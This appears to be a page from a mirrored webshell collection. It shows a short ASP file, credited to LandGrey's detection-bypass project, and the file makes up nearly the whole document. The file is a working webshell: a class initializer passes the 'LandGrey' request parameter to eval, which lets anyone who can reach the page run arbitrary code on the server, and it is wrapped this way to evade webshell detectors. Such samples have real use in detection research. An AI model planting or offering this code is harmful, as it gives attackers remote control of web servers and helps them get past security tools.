mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 12:51:28 +00:00
from: https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/asp author: Build By LandGrey
9 lines
132 B
Plaintext
9 lines
132 B
Plaintext
<%
|
|
Class LandGrey
|
|
Private Sub Class_Initialize
|
|
eval (request("LandGrey"))
|
|
End Sub
|
|
End Class
|
|
|
|
Set X = New LandGrey
|
|
%> |